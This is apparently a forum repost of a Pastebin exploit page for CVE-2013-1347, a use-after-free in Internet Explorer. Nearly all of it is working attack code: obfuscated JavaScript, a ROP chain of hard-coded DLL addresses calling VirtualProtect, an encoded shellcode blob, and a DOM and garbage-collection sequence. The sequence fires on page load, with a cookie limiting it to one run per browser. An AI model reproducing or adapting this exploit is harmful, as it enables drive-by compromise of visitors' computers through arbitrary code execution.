Nytro

CVE-2013-1347 - MSIE Use After Free EXP


MSIE Use After Free EXP/CVE-2013-1347

<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>

<script>
// Obfuscated aliases; all three are assigned without a declaration and so
// become implicit globals read by the helpers below.
//   pRESSURA - the built-in unescape(), looked up indirectly through eval()
//              rather than by name (an indirection/obfuscation pattern)
//   fAHPARIC - IE's CollectGarbage()
//   dISCESA  - the '%u' escape prefix that rIGUARDI() prepends to each word
pRESSURA = eval('unescape');
fAHPARIC = CollectGarbage;
dISCESA = '%u';
/**
 * Converts an 8-hex-digit string (as produced by vILMENTE) into two UTF-16
 * code units by building '%uXXXX%uYYYY' and passing it to unescape.
 * The second half of the input (chars 4..7) is emitted first and the first
 * half (chars 0..3) second, i.e. the 32-bit value comes out low word first.
 * Depends on the globals pRESSURA (unescape) and dISCESA ('%u').
 * @param {string} rEPLACEMENT - exactly 8 hex characters
 * @returns {string} a 2-character string
 */
function rIGUARDI(rEPLACEMENT) {
return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4));
}

/**
 * Formats a 32-bit value as 8 lowercase hex digits, most significant byte
 * first; each byte is left-padded with '0' to two digits.
 * The four intermediates are assigned without var and therefore leak as
 * globals (rAPPACIATI, mOSTRARTI, tERRENE, pRINCIPIO).
 * @param {number} tRIPARTITO - treated as an unsigned 32-bit value via >>>
 * @returns {string} 8 hex characters
 */
function vILMENTE(tRIPARTITO) {
rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10)); // byte 3 (most significant)
if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI;
mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10)); // byte 2
if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI;
tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10)); // byte 1
if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE;
pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10)); // byte 0 (least significant)
if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO;
return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO;
}
/**
 * Encodes a 32-bit constant as the 2-code-unit string the builders below
 * concatenate: vILMENTE() renders it as hex, rIGUARDI() turns that into
 * two UTF-16 units with the low word first.
 * @param {number} dw - 32-bit value
 * @returns {string} 2-character string
 */
function ue(dw) {
return rIGUARDI(vILMENTE(dw));
}

/**
 * Sets a marker cookie ("Cookie1=fucktheothers") that expires 3 days from now
 * (1000 ms * 3600 s * 24 h * 3). Paired with readc() it makes helloWorld()
 * run its body at most once per browser profile within that window; the
 * presence of this cookie is therefore an artifact showing the page was loaded.
 * Statements are unterminated (ASI) as written by the author.
 */
function setc() {
var Then = new Date()
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3)
document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString()
}

/**
 * Checks whether the marker cookie written by setc() is present.
 * Wraps document.cookie in a String object (unnecessary, indexOf works on
 * primitives) and searches for the marker value.
 * @returns {number} 0 when "fucktheothers" is absent from document.cookie, 1 otherwise
 */
function readc() {
var cookieString = new String(document.cookie);

if (cookieString.indexOf("fucktheothers") == -1) {
return 0
} else {
return 1;
}
}

/**
 * Concatenates a fixed sequence of 32-bit constants, each encoded by ue(),
 * into one string. The trailing comment on each line is the original author's
 * annotation; the en/kr notes below record the module base addresses the
 * constants were taken from, so the output is tied to one specific target
 * build and is not position-independent.
 * The loop appends the same constant 0x202 times (i runs 0..0x201 inclusive)
 * and uses an undeclared loop variable, so `i` leaks as a global.
 * @returns {string} the encoded sequence
 */
function DropPayload()
{
// en = 77c10000
// kr = 77bc0000
// offset = 50000
var r = "";
r+= ue( 0x77bd4cfa ); // # POP EBP # RETN [msvcrt.dll]
r+= ue( 0x77bd4cfa ); // # skip 4 bytes [msvcrt.dll]
r += ue( 0x77BFFA1C); // # POP EBX # RETN [msvcrt.dll]
r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201)
for(i=0;i<=0x201;i++) {
r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll]
}
r+= ue( 0x77be4de1 ); // # POP EAX # RETN [msvcrt.dll]
r+= ue( 0x2cfe04a7 ); // # put delta into eax (-> put += 0x00000040 into edx)
r+= ue( 0x77bfeb80 ); // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
r+= ue( 0x77c08fbc ); // # XCHG EAX,EDX # RETN [msvcrt.dll]
r+= ue( 0x77bde33f ); // # POP ECX # RETN [msvcrt.dll]
r+= ue( 0x77c0e062 ); // # &Writable location [msvcrt.dll]
r+= ue( 0x77bf6116 ); // # POP EDI # RETN [msvcrt.dll]
r+= ue( 0x77bf7a42 ); // # RETN (ROP NOP) [msvcrt.dll]
r+= ue( 0x77beb8ba ); // # POP ESI # RETN [msvcrt.dll]
r+= ue( 0x77bdaacc ); // # JMP [EAX] [msvcrt.dll]
r+= ue( 0x77beb860 ); // # POP EAX # RETN [msvcrt.dll]
r+= ue( 0x77bc1120 ); // # ptr to &VirtualProtect() [IAT msvcrt.dll]
r+= ue( 0x77d03ad9); // # PUSHAD # RETN [user32.dll]
r+= ue( 0x77c01025 ); // # ptr to 'push esp # ret ' [msvcrt.dll]

return r;
}
/**
 * Returns a single constant encoded by ue(). The name is the author's; what
 * the constant refers to is not verifiable from this listing, though like the
 * values in DropPayload() it is a fixed address tied to one target build.
 * @returns {string} 2-character string
 */
function align_esp()
{
var r= "";
r += ue(0x77BFD801);
return r;
}
/**
 * Returns a single constant encoded by ue(). As with align_esp(), the name is
 * the author's and the constant is a fixed value tied to one target build;
 * helloWorld() emits it once, as the last element of its repeated run.
 * @returns {string} 2-character string
 */
function xchg_esp()
{
var r="";
r += ue(0x77BC5ED5);
return r;
}
function helloWorld()
{
if (readc()) return;
setc();

unicorn = unescape("ABCD");
unicorn2 = unescape("EEEE");
for (i=0; i < 2; i++) {
unicorn += unescape("ABCD");
}unicorn += unescape("AB");

unicorn += DropPayload();
unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919";
animvalues = align_esp();

for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) {
animvalues += xchg_esp();
}
else {
animvalues += align_esp();
}
}

animvalues += unicorn;

for(i = 0; i < 13; i++) {
animvalues += ";red";
}
f0 = document.createElement('span');
document.body.appendChild(f0);
f1 = document.createElement('span');
document.body.appendChild(f1);
f2 = document.createElement('span');
document.body.appendChild(f2);
document.body.contentEditable="true";
f2.appendChild(document.createElement('datalist'));
f1.appendChild(document.createElement('span'));
f1.appendChild(document.createElement('table'));
try{
f0.offsetParent=null;
}catch(e) {

}f2.innerHTML="";
f0.appendChild(document.createElement('hr'));
f1.innerHTML="";

fAHPARIC();

try {
a = document.getElementById('myanim');
a.values = animvalues;
}
catch(e) {}
}

</script>
</head>
<body onload="eval(helloWorld());">
<t:ANIMATECOLOR id="myanim"/>

</body>
</html>

@PhysicalDrive0

Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com
